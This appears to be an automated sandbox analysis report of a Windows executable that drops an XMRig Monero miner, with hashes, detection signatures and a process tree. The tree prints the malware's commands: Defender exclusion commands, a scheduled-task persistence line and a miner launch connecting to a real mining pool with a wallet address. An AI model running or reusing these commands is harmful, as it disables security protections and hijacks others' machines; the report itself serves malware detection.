Analysis
-
max time kernel
62s -
max time network
66s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
18/12/2022, 07:49
Static task
static1
Behavioral task
behavioral1
Sample
2637eb34ee0e5131f80452b12bbdddba.exe
Resource
win7-20220901-en
General
-
Target
2637eb34ee0e5131f80452b12bbdddba.exe
-
Size
2.0MB
-
MD5
2637eb34ee0e5131f80452b12bbdddba
-
SHA1
39305d513cffc1bf6b8a20cdd912532ade05a7ed
-
SHA256
9e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7
-
SHA512
0b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b
-
SSDEEP
49152:cpFtPeFTefWNTt0dYMuZDGmA9MUy41+hrDy:cpWeulpZa/l1m2
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/memory/2008-178-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/2008-182-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 564 GAPOSUR.exe -
Loads dropped DLL 1 IoCs
pid Process 1368 cmd.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 564 set thread context of 2008 564 GAPOSUR.exe 42 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2024 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1708 timeout.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 1536 2637eb34ee0e5131f80452b12bbdddba.exe 564 GAPOSUR.exe 912 powershell.exe 344 powershell.exe 568 powershell.exe 592 powershell.exe 564 GAPOSUR.exe 564 GAPOSUR.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1536 2637eb34ee0e5131f80452b12bbdddba.exe Token: SeDebugPrivilege 564 GAPOSUR.exe Token: SeDebugPrivilege 912 powershell.exe Token: SeDebugPrivilege 344 powershell.exe Token: SeDebugPrivilege 568 powershell.exe Token: SeDebugPrivilege 592 powershell.exe Token: SeLockMemoryPrivilege 2008 vbc.exe Token: SeLockMemoryPrivilege 2008 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2008 vbc.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 1536 wrote to memory of 592 1536 2637eb34ee0e5131f80452b12bbdddba.exe 26 PID 1536 wrote to memory of 592 1536 2637eb34ee0e5131f80452b12bbdddba.exe 26 PID 1536 wrote to memory of 592 1536 2637eb34ee0e5131f80452b12bbdddba.exe 26 PID 1536 wrote to memory of 568 1536 2637eb34ee0e5131f80452b12bbdddba.exe 27 PID 1536 wrote to memory of 568 1536 2637eb34ee0e5131f80452b12bbdddba.exe 27 PID 1536 wrote to memory of 568 1536 2637eb34ee0e5131f80452b12bbdddba.exe 27 PID 1536 wrote to memory of 1368 1536 2637eb34ee0e5131f80452b12bbdddba.exe 30 PID 1536 wrote to memory of 1368 1536 2637eb34ee0e5131f80452b12bbdddba.exe 30 PID 1536 wrote to memory of 1368 1536 2637eb34ee0e5131f80452b12bbdddba.exe 30 PID 1368 wrote to memory of 1708 1368 cmd.exe 32 PID 1368 wrote to memory of 1708 1368 cmd.exe 32 PID 1368 wrote to memory of 1708 1368 cmd.exe 32 PID 1368 wrote to memory of 564 1368 cmd.exe 33 PID 1368 wrote to memory of 564 1368 cmd.exe 33 PID 1368 wrote to memory of 564 1368 cmd.exe 33 PID 564 wrote to memory of 912 564 GAPOSUR.exe 34 PID 564 wrote to memory of 912 564 GAPOSUR.exe 34 PID 564 wrote to memory of 912 564 GAPOSUR.exe 34 PID 564 wrote to memory of 344 564 GAPOSUR.exe 36 PID 564 wrote to memory of 344 564 GAPOSUR.exe 36 PID 564 wrote to memory of 344 564 GAPOSUR.exe 36 PID 564 wrote to memory of 1412 564 GAPOSUR.exe 38 PID 564 wrote to memory of 1412 564 GAPOSUR.exe 38 PID 564 wrote to memory of 1412 564 GAPOSUR.exe 38 PID 1412 wrote to memory of 2024 1412 cmd.exe 40 PID 1412 wrote to memory of 2024 1412 cmd.exe 40 PID 1412 wrote to memory of 2024 1412 cmd.exe 40 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42 PID 564 wrote to memory of 2008 564 GAPOSUR.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe"C:\Users\Admin\AppData\Local\Temp\2637eb34ee0e5131f80452b12bbdddba.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:568
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp366D.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:1708
-
-
C:\ProgramData\cloud\GAPOSUR.exe"C:\ProgramData\cloud\GAPOSUR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GAPOSUR" /tr "C:\ProgramData\cloud\GAPOSUR.exe"5⤵
- Creates scheduled task(s)
PID:2024
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2008
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD52637eb34ee0e5131f80452b12bbdddba
SHA139305d513cffc1bf6b8a20cdd912532ade05a7ed
SHA2569e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7
SHA5120b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b
-
Filesize
2.0MB
MD52637eb34ee0e5131f80452b12bbdddba
SHA139305d513cffc1bf6b8a20cdd912532ade05a7ed
SHA2569e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7
SHA5120b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b
-
Filesize
141B
MD511b043cb8cd71726676606956c70378f
SHA1a5f58ea44c18d9f7681857c4f21f840d029e9675
SHA25661363e00b03c592ac6ec4278948a7121a15f6df7d77d5e3fd0571bca795414c4
SHA51243a7959fd4feb441d4565cff07a5c64e32cf3392c40314d58bebc34138f0b06990097a99ffa8cd66c3c9b4dd11163dcf170961b8a1c69240a891273adc6e5332
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e7dcd864ccebbadc74d1c7daa2635e39
SHA12b4af779d5397db778c8fa8be2d8d9d4888e6188
SHA256a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c
SHA512b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e7dcd864ccebbadc74d1c7daa2635e39
SHA12b4af779d5397db778c8fa8be2d8d9d4888e6188
SHA256a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c
SHA512b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e7dcd864ccebbadc74d1c7daa2635e39
SHA12b4af779d5397db778c8fa8be2d8d9d4888e6188
SHA256a57b4db14443d0c0012347f2280891a19d55d5ae663d58fc2fe3589cdaa9ab6c
SHA512b867d60afdb25db29587396b31486b0243b30c5d50136833c4e015bf5fc2b758e1ef5e3749d1747805886966a69c2c5b78791e158141448c9d53ae89a608e011
-
Filesize
2.0MB
MD52637eb34ee0e5131f80452b12bbdddba
SHA139305d513cffc1bf6b8a20cdd912532ade05a7ed
SHA2569e6f702e49e2effdc3470632184a8ceb8bcd1eb60b85293114ce61fef8f8b4c7
SHA5120b58c9bf00dafb5b3474da0cf7c8bac45ed8f3ebefbea161c468b87c37d43a904144f56a9c771c519258c17fc7ee8faea129fd3cb7dc8113fa87c113d425ee4b